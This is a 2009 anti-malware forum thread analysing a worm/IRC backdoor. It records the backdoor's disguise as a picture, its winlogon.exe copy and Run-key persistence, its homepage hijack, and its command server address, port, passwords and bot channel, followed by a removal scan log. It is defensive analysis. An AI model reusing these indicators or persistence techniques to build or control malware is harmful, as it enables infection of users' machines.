Sign In
Create Account
0
http://www.virustotal.com/analisis/d9c6247...910f5eb6ac1e533
Result: 3/38 (7.9%)
hxxp://hi5-album.com/foto.php?
#1
Posted 18 February 2009 - 07:51 PM
-
- Honorary Members
-
- 179 posts
Advanced Member
- Gender:Male
- Interests:Mainly salmon
Trojan.Salmon moving to fish tank on reboot.
Back to top
#2
Posted 18 February 2009 - 08:21 PM
-
- Experts
-
- 217 posts
Advanced Member
- Gender:Male
- Location:London
Yup this ones a lovely little worm/irc backdoor....
Blogged it
It uses a picture icon and by default a user will not be able to see the .exe part of the filename (thanks, Windows) so they are more likely to be fooled into launching it:
2.JPG 11.19K
15 downloads
Once launched creates following:
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\rye.exe
Gives a fake error message so as not to arouse suspicion:
1.jpeg 2.96K
16 downloads
Copies itself as winlogon.exe to C:\WINDOWS\winlogon.exe (not the real location of the genuine winlogon, which is in system32 folder)
Adds autorun object to start itself with the pc:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ "Window UDP Control Servic" winlogon.exe
Then changes the IE homepage as so:
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SoftwareMicrosoft\Internet Explorer\main Start Page _http://www.postarticles.net
Also does a DNS lookup for the following site:
radiofm24.info DNS_TYPE_A Result: 216.87.167.7
And joins the IRC channel there full of other bots as so:
Blogged it
It uses a picture icon and by default a user will not be able to see the .exe part of the filename (thanks, Windows) so they are more likely to be fooled into launching it:
2.JPG 11.19K
15 downloadsOnce launched creates following:
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP
C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\rye.exe
Gives a fake error message so as not to arouse suspicion:
1.jpeg 2.96K
16 downloadsCopies itself as winlogon.exe to C:\WINDOWS\winlogon.exe (not the real location of the genuine winlogon, which is in system32 folder)
Adds autorun object to start itself with the pc:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ "Window UDP Control Servic" winlogon.exe
Then changes the IE homepage as so:
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SoftwareMicrosoft\Internet Explorer\main Start Page _http://www.postarticles.net
Also does a DNS lookup for the following site:
radiofm24.info DNS_TYPE_A Result: 216.87.167.7
And joins the IRC channel there full of other bots as so:
->216.87.167.7:4244 Nick: [00|USA|120106] Username: XP-4979 Server Pass: gooback Joined Channel: #!spr! with Password xole Channel Topic for Channel #!spr!: ".msn.stop|.msn.msg http://hi5-album.com/foto.php?=" Private Message to Channel #!spr!: "msn// Thread Activated: Sending Message." Private Message to Channel #!spr!: "msn// Thread Disabled."
Kind Regards,
Baz.
Baz.
#3
Posted 18 February 2009 - 08:40 PM
-
- Moderators
-
- 16,158 posts
Malware BBQ'er
- Gender:Male
- Location:127.0.0.1
We did'nt have the installer covered(will be added shortly) but the payload bot+load entry in <windows> are covered by smart IPH rule and will be expunged with a fast scan
#4
Posted 18 February 2009 - 08:43 PM
-
- Experts
-
- 217 posts
Advanced Member
- Gender:Male
- Location:London
What about the homepage hijack, reckon that site is worth blacklisting?
Kind Regards,
Baz.
Baz.
#5
Posted 18 February 2009 - 09:00 PM
-
- Moderators
-
- 16,158 posts
Malware BBQ'er
- Gender:Male
- Location:127.0.0.1
Baz., on Feb 18 2009, 08:43 PM, said:
What about the homepage hijack, reckon that site is worth blacklisting?
Already there
Malwarebytes' Anti-Malware 1.34
Database version: 1775
Windows 5.1.2600 Service Pack 2
18/02/2009 20:54:30
mbam-log-2009-02-18 (20-54-30).txt
Scan type: Quick Scan
Objects scanned: 48896
Time elapsed: 1 minute(s), 50 second(s)
Memory Processes Infected: 1
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 1
Memory Processes Infected:
C:\WINDOWS\winlogon.exe (Trojan.Agent) -> Unloaded process successfully.
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window UDP Control Servic (Backdoor.Bot) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page (Hijack.Homepage) -> Bad: (http://www.postarticles.net) Good: (http://www.google.com/) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
C:\WINDOWS\winlogon.exe (Backdoor.Bot) -> Delete on reboot.
#6
Posted 18 February 2009 - 09:09 PM
-
- Experts
-
- 217 posts
Advanced Member
- Gender:Male
- Location:London
#7
Posted 05 April 2009 - 11:41 PM
-
- Members
-
- 1 posts
New Member
Fatdcuk, on Feb 18 2009, 10:00 PM, said:
Already there
Malwarebytes' Anti-Malware 1.34
Database version: 1775
Windows 5.1.2600 Service Pack 2
18/02/2009 20:54:30
mbam-log-2009-02-18 (20-54-30).txt
Scan type: Quick Scan
Objects scanned: 48896
Time elapsed: 1 minute(s), 50 second(s)
Memory Processes Infected: 1
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 1
Memory Processes Infected:
C:\WINDOWS\winlogon.exe (Trojan.Agent) -> Unloaded process successfully.
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window UDP Control Servic (Backdoor.Bot) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page (Hijack.Homepage) -> Bad: (http://www.postarticles.net) Good: (http://www.google.com/) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
C:\WINDOWS\winlogon.exe (Backdoor.Bot) -> Delete on reboot.
Malwarebytes' Anti-Malware 1.34
Database version: 1775
Windows 5.1.2600 Service Pack 2
18/02/2009 20:54:30
mbam-log-2009-02-18 (20-54-30).txt
Scan type: Quick Scan
Objects scanned: 48896
Time elapsed: 1 minute(s), 50 second(s)
Memory Processes Infected: 1
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 1
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 1
Memory Processes Infected:
C:\WINDOWS\winlogon.exe (Trojan.Agent) -> Unloaded process successfully.
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
(No malicious items detected)
Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Window UDP Control Servic (Backdoor.Bot) -> Quarantined and deleted successfully.
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page (Hijack.Homepage) -> Bad: (http://www.postarticles.net) Good: (http://www.google.com/) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
C:\WINDOWS\winlogon.exe (Backdoor.Bot) -> Delete on reboot.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users
